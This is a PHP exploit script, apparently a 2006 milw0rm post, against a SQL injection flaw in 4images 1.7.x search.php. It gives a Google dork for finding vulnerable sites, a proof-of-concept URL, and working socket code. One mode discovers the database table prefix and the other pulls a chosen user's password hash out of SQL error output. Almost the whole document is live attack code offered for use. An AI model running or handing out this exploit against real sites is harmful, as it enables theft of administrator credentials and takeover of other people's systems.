#!/usr/bin/php <?php /* 4images 1.7.x Remote SQL Injection Vulnerability Usage: php file.php [host] [path] [table prefix] [user id] Googledork "powered by 4images 1.7.x" Vulnerability: Disfigure Research: h3llfyr3 Coding: Synsta. PoC: <target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN [w4ck1ng] - w4ck1ng.com */ if(!$argv[3]){ die("Usage: php $argv[0] [host] [path] [options] [table prefix] [user id]\n Options: -d: Determine table prefix\n Example: php $argv[0] domain.com /4images/ 4images_ 1 php $argv[0] domain.com /4images/ -d\n"); } if(eregi("http://", $argv[1])){ die("Usage: php $argv[0] [host] [path] [options] [table prefix] [user id]\n Options: -d: Determine table prefix\n Example: php $argv[0] domain.com /4images/ 4images_ 1 php $argv[0] domain.com /4images/ -d\n"); } if($argv[3]=="-d"){ $pipe = fsockopen($argv[1],80); if(!$pipe){ die("Cannot connect to host."); } else { $sql = "x%27"; $sql = urlencode($sql); $req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n"; $req .= "Host: $argv[1]\r\n"; $req .= "Connection: Close\r\n\r\n"; fwrite($pipe , $req); while(!feof($pipe)) { $data .= fgets($pipe); } $gdata= explode("FROM ",$data); $gtab = explode("WHERE ",$gdata[1]); $tab = trim($gtab[0]); $tab = str_replace("users","",$tab); if(eregi("<br />", $page)){ die("Failed.."); }else{ die("Table Prefix: $tab\n"); } } } if($argv[4]){ $pipe = fsockopen($argv[1],80); if(!$pipe){ die("Cannot connect to host."); } else { $sql = "x%27%20union%20select%20user_password%20from%20"."$argv[3]"."users%20where%20user_id%3D%27$argv[4]"; $sql = urlencode($sql); $req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n"; $req .= "Host: $argv[1]\r\n"; $req .= "Connection: Close\r\n\r\n"; fwrite($pipe , $req); while(!feof($pipe)) { $data .= fgets($pipe); } $gdata = explode("Unknown column '",$data); $ghash = explode("' in 'where clause'",$gdata[1]); $hash = $ghash[0]; if(strlen($hash) != 32){ die("Exploit failed..\n"); }else{ echo "Outputted Hash: $hash\n"; } } } ?> # milw0rm.com [2006-10-08]
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